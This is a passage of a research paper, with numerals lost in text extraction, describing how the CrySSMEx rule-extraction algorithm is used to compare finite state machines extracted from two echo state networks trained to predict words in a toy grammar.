describes the cryssmex algorithm. following this, we present details of our simulations: the language on which the networks were trained and tested, the architecture of the networks, and the difference between esn and esn+. section shows the fsms that were extracted from the two networks, as well as the corresponding state-space quantisations, at least to the extent that this turned out to be feasible. these results are interpreted and discussed in section . . analysing recurrent neural networks a fundamental problem for qualitative analyses of rnns is that even small networks can form complex dynamical systems. given a single problem instance and a fixed network topology, a wide range of unique behaviours may result from training the network. understanding each network’s idiosyncratic behaviour can take a lot of effort. alternatively, a statistical analysis (i.e., over populations of rnns) could be performed. such an analysis is usually not preferred, however, because the networks’ individual characteristics are typically lost. countless analysis methods have been developed in parallel with new rnn algorithms and architectures (for a brief list, see jacobsson ). in most cases, trained network instances are analysed on the basis of their hidden activations (e.g., elman ). however, the analysis often requires deep, or even complete knowledge of the domain itself. as a typical and excel- lent example of this, bodén and wiles ( ) used several tools to analyse, quantify, and group qualitatively different rnns. the networks were trained on context-free and context-sensitive formal languages. since the rnns were fed long monotonous sequences, their behaviours were largely governed by the dynamics near the fixed points of the state space. the analy- sis took advantage of this by using the properties of the eigenvalues of the jacobian matrix near the fixed point as a basic taxonomy. the analysis was complemented with state-space d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science plots, which was only feasible because the number of state nodes was limited to two. although the results were interesting (showing previously unknown regularities in the dynamics of the rnns), they could only be obtained because the authors defined the domain precisely and (pre- sumably) knew what they were looking for. moreover, the network’s dynamics was visually accessible. . . rule extraction from recurrent neural networks as discussed above, many researchers employ an analysis method that is tailored for the specific network and domain under investigation. this form of ad hoc analysis is perhaps the most common, and may also be necessary to uncover the specifics of the solutions implemented through rnns; solutions that may very well be counterintuitive and interesting in many ways. however, one class of analysis methods, rule extraction, represents a broader and more generic approach to the problem of neural network analysis and has become a research field in its own right (andrews, diederich, and tickle ; jacobsson ). these techniques are typically developed to be portable and as widely applicable as possible (i.e., independent of network type and domain). the quality of a rule extractor is typically measured by (adapted from andrews et al. ): rule accuracy, in terms of how well the rules perform on the test set; rule fidelity, that is, how well the rules mimic the behaviour of the rnn; and rule comprehensibility, roughly corresponding the readability of the extracted rules and/or the size of the rule set. existing techniques for extracting rules (represented as fsm) from rnns were surveyed by jacobsson ( ). it turned out that, despite a great deal of diversity, all algorithms have four constituents in common: ( ) quantisation of the continuous state space of the rnn (e.g., by self-organising maps or k-means), resulting in a discrete set of states. ( ) generation of internal states and outputs by feeding input patterns to the rnn. ( ) construction of rules from the observed state transitions, usually resulting in deterministic automata. ( ) minimisation of the rule set, using some standard algorithm (see hopcroft and ullman ). as argued by jacobsson ( ), none of the existing techniques attempted to merge these four parts in any principled manner. for example, the surveyed techniques implemented the state-space quantisation through standard techniques, completely independent from machine minimisation, even though many clustering algorithms are based on merging of clusters that are equivalent (mirkin ), in a manner much like the merger of computationally equivalent states by the fsm minimisation algorithms. moreover, rule-extraction techniques could typically only be suc- cessfully applied to low-dimensional networks (up to three dimensions). in fact, basic plots of the state space were often more informative than the extracted machines themselves. . . cryssmex a basic problem when using standard clustering algorithms for quantising the state space of an rnn, or of any other dynamical system, is that the state space should not primarily be treated as euclidean space: since the state of an rnn governs its current and future behaviour, small distances in the state space may have a large impact on the functioning of the network, whereas large state-space distances may only affect the network minimally. the algorithm we use here, cryssmex (the crystallising substochastic sequential machine extractor) (jacobsson a), d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson does not suffer from this problem because it takes into account the dynamical rather than static geometric properties of the state space. . . . finite state machine extraction the cryssmex algorithm (outlined in algorithm ) is based on the combination of the above- mentioned four constituents. as an rnn operates on training or test data, cryssmex extracts a probabilistic fsm given the network’s input, internal states, and outputs. these data (denoted � in algorithm ) are sampled while the network processes sequences of inputs, as it does during training or testing. starting with a single-state fsm, cryssmex iteratively adjusts the fsm by splitting and merging states (i.e., changing the quantisation of the rnn’s state space), until the fsm is fully deterministic. cryssmex(�) input: time-series data, �, containing a sequence of input symbols, output symbols, and state vectors generated by the rnn when processing test data output: a deterministic machine m mimicking the rnn (if successful) begin let m be the stochastic machine based on � resulting from an unquantized state space (i.e. only one state); repeat select state vectors from � corresponding to indeterministic states in m; update the state quantiser by splitting the rnn state space according to selected data; create m using new state quantiser; if m has equivalent states then merge equivalent states; end until m is deterministic (success) or the number of iterations exceeds a predefined limit ; return m; end algorithm a simplified description of the main loop of cryssmex. m is created from the sequence of observed rnn inputs, outputs, and states contained in � by quantisation of the state space. this quantisation is iteratively refined, resulting in a sequence of increasingly accurate fsms being extracted. in each iteration, the current fsm’s ‘weakest’ points, which are its most non-deterministic states, are targeted for improvement by actively selecting the corresponding rnn states as the data to be used for refining the quantisation. the algorithm also keeps the extracted model minimal by merging regions in the state space that correspond to states that are computationally equivalent in the fsm. it was shown (jacobsson a; jacobsson, frank, and federici ) that cryssmex can efficiently extract probabilistic (or, in favourable circumstances, deterministic) fsms from rnns trained on deeply embedded grammars (anbn), high-dimensional rnns ( internal nodes), esns, and chaotic systems. moreover, the algorithm was successfully adapted to extract either moore- or mealy-type machines (jacobsson et al. ). in a mealy machine, the output of the network and the extracted machine is defined over transitions between states. in a moore machine, on the other hand, the output is defined as a function of the current state and input (hopcroft and ullman ). depending on the domain and network, either moore or mealy models will be d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science more compact and/or comprehensible. for the current application, we chose to extract moore machines, since these correspond more closely to the esns, whose output is indeed a function of the current state and input. . . . state-space quantisation to merge and split the state space, cryssmex creates a number of simple vector quantis- ers, arranged hierarchically in a graph (figure in section . shows an example). each split corresponds to a node in the graph, describing how the state space is separated into increasingly smaller regions. the algorithm that creates this arrangement of quantisers was called the crystalline vector quantiser (cvq) in jacobsson ( a). roughly speaking, it generates the so-called cvq graph by creating enough simple vector quantisers to split the state space properly. consequently, the number of required quantisers is inversely proportional to the quality of their operation for the data set under investigation. the vector quantiser in jacobsson ( a) was chosen to be simple and parameter-free, showing that the extracted machines were not impaired by an inappropriate choice of underlying quantisers. however, this quantiser is very sensitive to outliers or skewed distributions, typically making the resulting cvq graph size larger than would be implied by the number of iterations of cryssmex alone. . . . scaling properties prior to cryssmex, rule extraction from rnns had only been applied to networks with just a handful of internal units. whether rule extraction is feasible depends of course on the network’s size, but even more strongly so on its dynamics: a chaotic network with just one unit requires more fsm states than a very large but non-chaotic network (for a deeper discussion of this issue, see jacobsson a). cryssmex can easily handle much larger and more chaotic networks because it generates a sequence of stochastic fsms that form increasingly precise approximations of the network’s behaviour. if obtaining a full (i.e., deterministic) fsm description of the network is not feasible, the algorithm can be stopped after any iteration, yielding an fsm that may at least be sufficiently complete. moreover, since cryssmex currently (and quite deliberately) uses very simple vector quantisation for analysing the networks’ state space, it is reasonable to assume that the algorithm’s scaling properties could be further improved by using optimised algorithms (e.g., support vector machines). however, an investigation of this issue is beyond the scope of the current paper. it is less clear how well cryssmex scales up when the number of input and output symbols increases. the problem is essentially one of data scarcity: in every state there will be many possible input symbols for which a prediction needs to be modelled. how to deal with this is an open issue, but as argued elsewhere (jacobsson b), one could try an active learning approach in which the extraction algorithm interacts with the network directly to gather more data when needed. . method this section presents the methodological details of our simulations. first, in section . , we present the language processed by the networks, as well as the specific division into two distinct sets of sentences: those used for training and those used for testing. as explained in section . , two esns were trained to predict the upcoming word at each point in a sentence. that section also d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson explains how prediction performance is assessed, and how the networks’ outputs are discretised for cryssmex analysis. . . the language . . . lexicon the semi-natural language used by frank and čerňanský ( ) has a lexicon of words, containing plural nouns (e.g., girls, boys), transitive verbs (e.g., chase, see), two prepositions (from and with), one relative clause marker (that), and an end-of-sentence marker denoted [end], which is also considered a word. the nouns are divided into three groups: female nouns (e.g., women), male nouns (e.g., men), and animal nouns (e.g., bats). as explained below, this distinction is only relevant for distinguishing between training and test sentences. since the language has only syntax and no semantics, the names of words within each syntactic category are irrelevant and only provided to make the sentences more readable. . . . grammar sentences are generated by the grammar in table . the simplest sentences, such as mice love cats [end], are just four words long, but longer sentences can be constructed by adding one or more prepositional phrases or relative clauses. relative clauses come in two types: subject-relative clauses (srcs, as in mice that love cats…) and object-relative clauses (orcs, as in mice that cats love…). since srcs can themselves contain a relative clause (as in mice that love cats that dogs avoid [end]), there is no upper bound to sentence length. . . . training and test sentences we adopted not only the language used by frank and čerňanský ( ), but also their division of sentences into subsets used for training and testing. the common approach is to set aside a random sample of possible inputs, and train only on the remaining sentences. however, frank and čerňanský’s specific goal was to investigate whether esns can generalise to sentences that contain words occurring at positions they did not occupy during training. therefore, specific groups of sentences were withheld during training, such that some nouns only occurred in particular grammatical roles: male nouns were banned from subject position and female nouns did not occur in the object position (table shows which positions are considered to hold subject nouns table . probabilistic context-free grammar of the language. s → npsubj v npobj [end] npr → nr ( . ) | nr src ( . ) | nr orc ( . ) | nr ppr ( . ) src → that v npobj orc → that nsubj v ppr → from npr | with npr nr → nfem | nmale | nanim nfem → women | girls | sisters nmale → men | boys | brothers nanim → bats | giraffes | elephants | dogs | cats | mice v → chase | see | swing | love | avoid | follow | hate | hit | eat | like variable r denotes a noun’s grammatical role (subject or object). the prob- abilities of different productions are equal, except for np, where they are given in parentheses. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science and which hold object nouns). the resulting training set consisted of sentences, with an average length of . words. frank and čerňanský ( ) tested networks on eight different types of sentences, but we will restrict our qualitative analysis to just one of these. the test set consisted of all sentences with structure ‘nmale v nfem that nmale v [end]’. that is, all test sentences had one orc, which modified the second noun. note that animal nouns do not occur in test sentences, and that the roles of male and female nouns are reversed compared with training sentences: male nouns are in the subject position whereas female nouns are objects. this means that all test sentences differ quite strongly from the training sentences. the first word of a test sentence is always a male noun, which never occurred in the sentence-initial position during training. this makes generalisation to test sentences much more challenging than would have been the case if training sentences had been selected by an unrestricted random sample. . . the echo state networks . . . architecture we investigated the behaviour of two esns, with identical architectures. as shown in figure , words are represented locally on the -unit input layer that feeds activation to a recurrent layer, which is called the ‘dynamical reservoir’ (dr) as is common in the esn literature. the dr also receives its own activation in the previous time step and feeds activation to the output layer. the output layer, like the input layer, has units, each representing one word. input. if the word i forms the input to the esn at time step t , the input activation vector ain(t) = (a , . . . , a ) has ai (t) = and aj (t) = for all j �= i. the weights of connections from input units to the dr are collected in the × input weight matrix win. in most esns, these weights are chosen randomly, but here we use a different approach in which the input weights depend on the training data. in the esn+ model, most inputs weights are , but for dr-units j = , . . . , , the weight of the connection from input unit i to dr-unit j equals wj,i = n × n (i, j ) + n (j, i) n (i)n (j ) , figure . architecture of esn(+). weights of connections between dr units (wdr ; solid arrow) are random and fixed; weights of connection from dr to output units (wout ; dotted arrow) are adapted to training data and task; weights of connections from input to dr units (win ; dashed arrow) are random and fixed in esn, but adapted to training data in esn+. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson where n is the number of word tokens in the training data, n (i) is the number of times the word i occurs in the training data, and n (i, j ) is the number of times the word j directly follows i. we adopted this particular approach from frank and čerňanský ( ), who used it because it was found by bullinaria and levy ( ) to yield the word representations that could be successfully applied to several syntactic and semantic tasks. moreover, it is extremely simple, allowing for fast computation of the input weights. choosing win in this manner results in the encoding of syntactic category information in the input weights. if we take column vector i of win (i.e., the weights of connections emanating from input unit i) to represent word i, it turns out that representations of words of the same category cluster together. as figure shows, there is a clear separation between nouns, verbs, prepositions, that, and [end]. in spite of the distinctive roles of female, male, and animal nouns in the training sentences, these three groups of nouns are more similar to one another than to other syntactic categories. this increases esn+ performance on test sentences because words within a syntactic category are equivalent according to the grammar of table (see frank and čerňanský , for a comprehensive discussion). esn+ is compared with a standard esn, that is, one with random input weights. however, a fair comparison between the two networks requires that the esn’s input weights are at least distributed similarly to those of esn+. for this reason, the esn’s input weights wj,i (for j = , . . . , ) are a random permutation of the corresponding weights of esn+. for j > , the esn’s input weights are , as in esn+. note that this does away with the syntactic information present in win, while making sure that the distribution of input weights is the same for esn and esn+. dynamical reservoir. the two networks, esn and esn+, have identical drs. it has units, connected to each other with weights collected in the × -matrix wdr . the dr is sparsely connected in that % of the values in wdr are . all other values are taken randomly from a uniform distribution centred at , after which they are linearly rescaled such that the spectral radius of wdr (i.e., its largest eigenvalue) equals . . dogs mice bats cats elephants giraffes sisters men brothers boys women girls [end] from with chase avoid follow eat see bump love like swing hit that figure . hierarchical cluster analysis of word representation vectors (i.e., input weights). d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science the dr’s activation vector at time step t , denoted adr(t) ∈ [ , ] , is computed at each time step by adr(t) = fdr(wdr adr(t − ) + winain(t)), ( ) where adr(t − ) is the dr state in the previous time step (with adr( ) = . at the beginning of each sentence) and fdr is the logistic function. output. the weights of connections from dr units to the outputs are collected in the × matrix wout . each output unit i also receives a bias activation bi . the output at time step t equals aout(t) = fout (wout adr(t) + b), ( ) where b is the vector of bias activations and fout is the softmax function: fi,out(x) = exi∑ j exj , ( ) due to which the outputs are positive and sum to , making aout a probability distribution. that is, the output value aout,i (t) is the network’s estimate of the probability that the word i will be the input at time step t + . . . . network training as explained by jaeger ( ), useful output connection weights and biases, wout and b, are easy to find without any iterative training method. ideally, a × (n − ) target matrix u = (u( ), u( ), . . . , u(n − )) is constructed, where each column vector u(t) has a value of at the single element corresponding to the input word at t + , and all other elements are . that is, the vector u(t) forms the correct prediction of the input at t + . next, the complete training sequence (excluding the last word) is run through the dr, according to equation ( ). the resulting vectors adr(t) are collected in a × (n − )-matrix a. the connection weight matrix and bias vector are now computed by wout = f− out(u)a+, b = f− out(u) , ( ) where a+ is the pseudoinverse of a, and is an (n − )-element column vector consisting of s. an obvious problem with this method is that the softmax function (equation ( )) does not have an inverse f− out , and even if it did, the values and would be outside the inverse domain. in the past, this problem was avoided by either applying a less efficient training method that does not involve f− out (frank a, b), or by taking fout to be the identity function. in the latter case, the resulting aout does not form a probability distribution, so an additional transformation is needed to remove negative values and make sure the activations sum to (čerňanský and tiňo , ; čerňanský et al. ; frank and čerňanský, ). here, we do take fout to be the softmax function and train the network using equation ( ). this is possible because, although fout has no inverse in general, a proper f − out(u) does exist for particular target vectors u. in our case, each u = (u , . . . , un)t has one element uc arbitrarily close to , whereas all other elements have an arbitrarily small but positive value � < n− (where n is the number of words in the language, that is, n = here). as derived in appendix , the inverse d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson softmax in that case equals: f − i,out(u) = { ln(�− − n + ) if i = c, if i �= c. we take � = . , making f − c,out(u) = ln( ) ≈ . . . . . network analysis prediction performance. since the grammar of the language is known, the true probability of occurrence of each word at each point in the sentence can be computed. the prediction perfor- mance of the networks is rated by comparing their output vectors, which can be interpreted as probability distributions over words, to the true distributions according to the grammar of table . more precisely, we take the kullback–leibler divergence from the output distribution to the true distribution as a measure for the network’s prediction error. extracting fsms. extracting an fsm from an rnn requires symbolic input and output, since an fsm’s transitions and states come with a finite set of unique labels. the network inputs in our simulations represent words, so denoting them by symbols is straightforward. the networks’ outputs, however, are not symbols but probability distributions. these continuous-valued vectors need to be discretised into symbols before cryssmex can be applied. the particular choice of output symbols is very important for the analysis. in the extreme case that all network outputs are given the same label, the resulting machine will have only one state and be completely uninformative. in contrast, choosing an output discretisation that is too fine-grained yields ‘bloated’ and incomprehensible fsms. therefore, the granularity of the discretisation should be fine enough for the symbols to be meaningful, but no finer than required for the issue under investigation. here, we make use of the fact that all words within each of the five syntactic categories (noun, verb, preposition, that, and [end]) are equivalent according to the language’s grammar (table ). this means that syntactic categories are just as meaningful as words, making a descretising of output vectors into words overly fine-grained. we therefore turn these vectors into symbols corresponding to the five syntactic categories. this is done by summing the activations of all output units representing words from the same category. the category with the highest total activation (i.e., the most probable one) is considered to be the output symbol of the network. summing over words of a category does not give unfair advantage to the categories with many words (such as the nouns) over those with few words (such as the single-word category ‘relative clause marker’). this is because, if some noun is possible according to the grammar, any noun is possible. therefore, the network needs to spread the total probability mass for ‘nouns’ over all individual nouns, whereas the total probability of the ‘relative clause marker’ goes to the single output unit representing the word that. . results . . network performance the networks’ prediction error on test sentences is shown in the left panel of figure . as expected, esn+ does better than the standard esn. this is true in particular at the sentence-final verb, that is, when having to predict [end]. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science test sentences k l − d iv e rg e n ce b o ys lik e g ir ls th a t m e n se e [e n d ] training sentences g ir ls lik e th a t se e [e n d ] b o ys w o m e n esn esn+ figure . prediction error of esn and esn+ at each word of test sentences (left) and training sentences with the same structure (right). results are averaged over sentences; the ones shown on the x-axes are just examples. eleven of the training sentences are of the form ‘nfem v nmale that nfem v [end]’, that is, they have the same structure as the test sentences. the right panel of figure shows the networks’ performance on these training sentences. again, esn+ does better than esn, but the difference is much smaller than it was for test sentences. interestingly, esn+ performs nearly as well on test sentences as on training sentences, indicating that it has reached the highest level of generalisation that might be expected. the standard esn, on the other hand, performs badly at several points of test sentences compared with the same points on training sentences. . . extracted fsms the quantitative findings presented above are not particularly surprising as they basically form a replication of frank and čerňanský ( ). the contribution of this paper lies in cryssmex’s qualitative analysis of two trained networks and of the difference between them. both networks were given all test sentences as well as all sentences of the form ‘nfem v nmale that nfem v [end]’. these latter sentences could have been in the training set but, as mentioned above, only of them were. during processing of the sentences, the networks’ inputs, internal states, and discretised outputs were recorded. next, cryssmex was applied to these data, for esn and esn+ separately. . . . esn+ figure shows the fsm that cryssmex extracted from the esn+ data after three iterations. this fsm is fully deterministic, indicating that cryssmex has converged after this iteration. the fsm has six states, indicated by the circles numbered – . the machine moves from one state to the next when it receives as input one of the words in the box connecting the two states. at the beginning of a sentence, the fsm must be in state since this is the only state that is entered when receiving the input symbol [end]. moreover, there is no other way to enter this state, showing that it does not occur at any other point in the sentence. when in this state, the network predicts the following input to be a noun, and indeed, all sentences of the language start with a noun, moving the fsm into state . here, it predicts the next word to be a verb, irrespective of whether the input was a male or a female noun. this is remarkable because in the network training data, a verb can only follow a male noun in some src constructions, such as mice that d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson :n boys, brothers, men, girls, sisters, women :v avoid, bump, chase, eat, like, follow, hit, love, see, swing :n boys, brothers, men, girls, sisters, women :[end] [end]that :n boys, brothers, men, girls, sisters, women :v avoid, bump, chase, eat,like, follow, hit, love, see, swing figure . final finite state machine extracted from esn+. circles denote network states. the symbol inside a circle is the output symbol (syntactic category) generated from that state. words in boxes are the input symbols (words) that move the automaton from one state to the next. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science like men chase cats [end]. only times in the training sentences did a verb directly follow a male noun, and never at the beginning of a sentence. the correct prediction of a verb in state , therefore must result from the previous input being a ‘subject’ and not just a ‘male noun’. that is, esn+ is more sensitive to the grammatical role of the noun than to its identity. otherwise, it would not have predicted a verb to come next. in fact, the fsm of figure makes no difference whatsoever between male and female nouns: whenever a noun allows for a particular state transition, all nouns do. this means that all nouns are equivalent to the fsm, even though male and female nouns are restricted to particular grammatical roles in training sentences. in other words, the network from which the fsm was extracted shows perfect generalisation to test sentences. after receiving the sentence’s second word (a verb), the fsm moves to state , where it predicts the next input to be a noun. indeed a noun occurs next, moving the fsm to state . here, the end-of-sentence marker is predicted, which is incorrect in the sense that the sentence is not yet over. however, it is a grammatically correct prediction: [end] can indeed follow ‘n v n’. after receiving that, the fsm is in state , where the next input is predicted to be a noun, that is, an orc is expected. it may seem surprising that the fsm never expects an src at this point (i.e., it never predicts a verb) even though that would be perfectly grammatical. presumably, a noun is always expected here because orcs occur more often than srcs: according to the grammar of table , orcs are % more frequent than srcs. the next two inputs are a noun (moving the system into state ) and a (correctly predicted) verb. the fsm ends up in state , where it correctly predicts [end]. it is now back in its starting state. no error (i.e., no grammatically incorrect prediction) was made in processing any of the sentences. . . . echo state networks first iteration. figure shows the fsm extracted from the esn data after the first cryssmex iteration. it has only three states at this point, but cryssmex did not yet terminate as is apparent from the fsm being stochastic: in many cases, a particular input word licences several transitions from the same state. for example, if the fsm is in state and receives the word brothers, it moves to state (where it predicts a verb) in only % of the cases. alternatively, it can remain in state and predict another noun to come next. that prediction is ungrammatical because a noun can never directly be followed by a noun. yet, in over % of the cases, receiving a noun in state results in the ungrammatical prediction of a noun. looking at figure , esn seems to perform only slightly worse than esn+ after noun inputs. we can now conclude that this is somewhat misleading. the small quantitative advantage of esn+ over esn (at noun inputs) in fact corresponds to a very large qualitative improvement: whereas esn+ makes no errors, esn often predicts a noun to follow a noun. it is important to keep in mind that this is not an error of the extracted fsm. it correctly describes the behaviour of the esn, which erroneously predicts a noun to follow a noun. although the fsm is correct in this sense, it is not complete: for instance, it must be in state at the beginning of a sentence (i.e., after processing [end]) but that same state can also be entered after processing a noun or verb. another error that can be observed in the fsm of figure is the occasional prediction of a verb (i.e., being in state ) after processing a verb. although the language does allow for a verb to be directly followed by another (e.g, mice that men like chase cats [end]), this is not possible in any of the ‘n v n that n v [end]’-sentences processed by the fsm. possibly, this error accounts for esn’s low prediction performance (figure ) at the sentence-final verb, that is, when [end] is the only correct prediction. further insight into this error can be obtained from the fsm extracted at the second cryssmex iteration. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson :n [end], that, boys: . , brothers: . , men: . , girls: . , women: . , sisters: . , avoid: . , bump: . , chase: . , eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . boys: . , brothers: . , men: . , girls: . , sisters: . , women: . , hit: . boys: . , brothers: . , men: . , girls: . , sisters: . , women: . , avoid: . , bump: . , chase: . , eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . :v [end], that, avoid: . , bump: . , chase: . , eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . chase: . , follow: . , hit: . avoid: . , bump: . , chase: . , eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . :[end] [end], that figure . first (stochastic) finite state machine extracted from esn. if a particular input word licences more than one transition from a state, the probability of a transition is given after the word. second iteration. in its second iteration, cryssmex splits the three states into seven, resulting in the fsm shown in figure . the fact that it is not deterministic shows that cryssmex has not yet converged, so more iterations are needed for further refinement. although this fsm has only one more state than the one extracted from the esn+ data (figure ), it is much more complex, making it difficult to interpret in full. for this reason, we will not discuss it in depth, but only point out how it sheds light on esn’s low prediction per- formance at the sentence-final verb. also, the fsm shows why there is a large difference between the performance on training and test sentences at this point. to begin with, note that state must be the sentence-initial state, as it is the only state entered after the input [end]. if the input is a potential training sentence (i.e., ‘nfem v nmale that nfem v [end]’), the path through the machine’s states is easy to follow. the first word, a female noun, must move the fsm into state , where a verb is correctly predicted. the incoming verb will nearly always result in state , predicting a noun. the following input is a male noun, moving the fsm into state . here, the prediction [end] is grammatical, although the actual next input is that, resulting in state in as much as % of the cases. the incoming female noun will most d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science :n boys: . , men: . boys: . , brothers, men: . , girls, sisters, women :v love: . love: . [end] avoid, bump, chase, eat, like, follow, hit: . , love: . , see, swing hit: . :n boys, brothers, men, girls: . , sisters: . , women: . , avoid: . , bump: . , chase: . , eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . that: . [end], that: . girls: . , sisters: . , women: . , avoid: . , bump: . , chase: . , eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . hit: . sisters: . :n boys: . [end] boys: . , brothers, men: . , women: . boys: . , men: . , girls: . , sisters: . girls: . , sisters: . girls: . , sisters: . , women: . :v love: . avoid, bump, eat, like, follow: . , hit: . , love: . , see, swing chase, follow: . , hit: . :v avoid: . , bump: . , chase, eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . that: . that: . avoid: . , bump: . , eat: . , like: . , follow: . , hit: . , love: . , see: . , swing: . :[end] that: . [end], that: . figure . second finite-state machine extracted from esn. often put the fsm into state , although states and are also possible. at this point, the only grammatically correct prediction is [end], that is, the fsm should move into state . indeed, a large majority of verb inputs at state yield state , but some errors (i.e, a noun prediction at state ) are also possible. if the fsm was not in state but in state , it cannot end up in the correct state . likewise, if the machine was in state (rather than or ) a verb input is very unlikely to move it to state . in short, there is not much opportunity for errors in training sentences, except at the sentence- final verb. this finding corresponds to esn’s prediction performance on training sentences, as displayed in figure . but how about test sentences? be reminded that after processing the sentence-final verb, the fsm should be in state . this state can be entered from states – and , but only from state it is likely that verb input results in state . from states – , there is only a d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson cryssmex iteration n u m b e r o f f s m s ta te s figure . number of states in the fsms extracted from esn, after each cryssmex iteration. very small probability that a verb moves the fsm into state . therefore, we can safely conclude that the machine should be in state immediately before the sentence-final verb arrives. however, note that state can only be entered when the input is a female noun whereas the actual input at this point in test sentences is always a male noun. hence, when the input is a test sentence, the fsm is not in state when it needs to be. consequently, it will hardly ever predict [end] when it needs to. this explains the large difference in esn prediction error between training and test sentences at the sentence-final verb. further iterations. as cryssmex continues to extract increasingly deterministic fsms from the esn, the number of states rises sharply, as can be seen in figure . after iterations, cryssmex has converged at an fsm with as many as states. . . state-space quantisation so far, we have only looked into the extracted machines themselves. machines that, to a large extent, reflect the network behaviour and grammatical correctness rather than their internal dynam- ics. in addition to these fsms, cryssmex generates hierarchical descriptions of the networks’ state space quantisations. since these cvq graphs form a rough description of the layout of the state space, they potentially hold important qualitative information about the networks’ dynamics. the cvq graph describing the state space of esn+, displayed in figure shows that esn+ is trivially mapped onto an fsm: it takes at most five quantisations to determine the fsm state for any state vector in the network. for the state space of esn, the situation is remarkably different. figure shows just a small part of the cvq graph corresponding to the first fsm extracted from the esn data (i.e., the one in figure ). this fsm has fewer states than the final machine extracted from esn+, yet the cvq graph is immensely more complex. in short, this tells us that the state space of esn is much more fragmented than that of esn+. consequently, cryssmex needs to work a lot harder to render an fsm description for esn than for esn+. . discussion . . comparing network behaviours we have presented the first ever application of cryssmex for a qualitative comparison of the behaviours of two networks. the algorithm proved to provide more insight than was obtained from a merely quantitative investigation of network performance. the difference in performance d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science vq vq vq vq vq vq vq vq vq vq figure . arrangement of vector quantisers (vq) for splitting the esn+ state space (corresponding to the fsm of figure ). the fsm state to which a given state vector belongs is decided by starting at the root vq and following the graph according to the winning model vector of each vq. arrows with a dot denote a merger of states. between esn and esn+ turned out to be the consequence of a much more significant, qualitative difference in their behaviours. comparing the two extracted fsms in figures and , it becomes clear that the two networks implement very different machines. in fact, it is hard to imagine that the rnns that gave rise to these fsms are nearly identical and process the same input sentences. the only difference between esn+ and esn is that the first has input connection weights that were adapted to the training data, whereas the second uses a random permutation of these. apparently, this small difference has immense consequences for the networks’ dynamics and behaviour: esn+ implements a straightforward fsm with six states, whereas the fsm extracted from esn has . even if we restrict ourselves to the non-deterministic, seven-state fsm after the second iteration of cryssmex, the behaviour of esn already turns out to be much more complex than that of esn+. looking at figures and , it becomes clear that a system that should be relatively simple (processing just one type of seven-word sentence) can implement an oversized fsm. the primary d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson reason why the esn data causes the extracted fsms to grow so large is that cryssmex will blindly keep refining the extracted rules, also with respect to undesired behaviour by the network. in this case, the desired grammar, as instantiated by esn+, is computationally much simpler than the erratic one instantiated by esn. since cryssmex is ignorant about which behaviour is desired and which is not, it cannot be blamed for creating huge fsms. it merely shows us the networks’ behaviour. the more com- plex that behavior, the more complex the extracted fsm. thanks to the iterative approach of the algorithm, however, the fsms extracted in the first few iterations can be quite informative. although they are incomplete, they may provide a comprehensible ‘summary’ of the complete, but incomprehensible, deterministic fsm that is implemented by the network. . . comparing network state spaces in an early comparison between srns and fsms (servan-schreiber, cleeremans, and mccelel- land ), the term graded state machine was tossed to describe the type of system embodied by an srn. the difference with an fsm is that a graded state machine has (possibly infinite) non-discrete states. each point in an srn’s state space can be considered a state of the machine, and states that are near to each other in the state space tend to (but do not necessarily) result from similar inputs and have similar effects on the network. esn+ makes uses of this graded nature of the state space by using inputs that are not truly symbolic. as pointed out by frank and čerňanský ( ), the vector of weights emanating from a particular input unit can be viewed as the representation of the word corresponding to that input, and adapting these weights results in representations that are analogical rather than symbolic: similarities among word representations are analogical to similarities among the grammatical properties of the represented words. more specifically, words from the same syntactic category are represented by vectors that are more similar to each other than vectors representing words from different categories, as is also apparent from figure . each input word drives the activation pattern in esn’s dynamical reservoir towards an attractor point that is unique for that input (tinǒ, čerňanský and beňušková ). because of the analogical nature of word representations in esn+, the attractor points associated with words from the same syntactic category will be closer together than those of words from different categories. as a result, fsm states that are functionally equivalent correspond to esn+ state-space points that are near to one another. such clustering of equivalent states facilitates state-space quantisation. presumably, this is why cryssmex converges after just three iterations when processing the esn+ data. moreover, the state-space clustering improves generalisation. this is because processing a test sentence leads to a state-space trajectory that visits the same clusters that were encountered during esn+ training. in other words, new sentences result in not-so-new internal network states. for esns, however, the situation is radically different. since its input weights are fixed at random values (i.e., it uses symbolic rather than analogical word representations) the distribution of attractors in its state space is basically random. even two states that are functionally equivalent can correspond to distant points in the state space. as a result, many splits and merges are required for a meaningful quantisation, delaying cryssmex convergence and resulting in the highly complex cvq graph, part of which is displayed in figure . also, the generalisation is impaired because the state-space trajectory resulting from a new sentence is largely unrelated to what was encountered during esn training. to 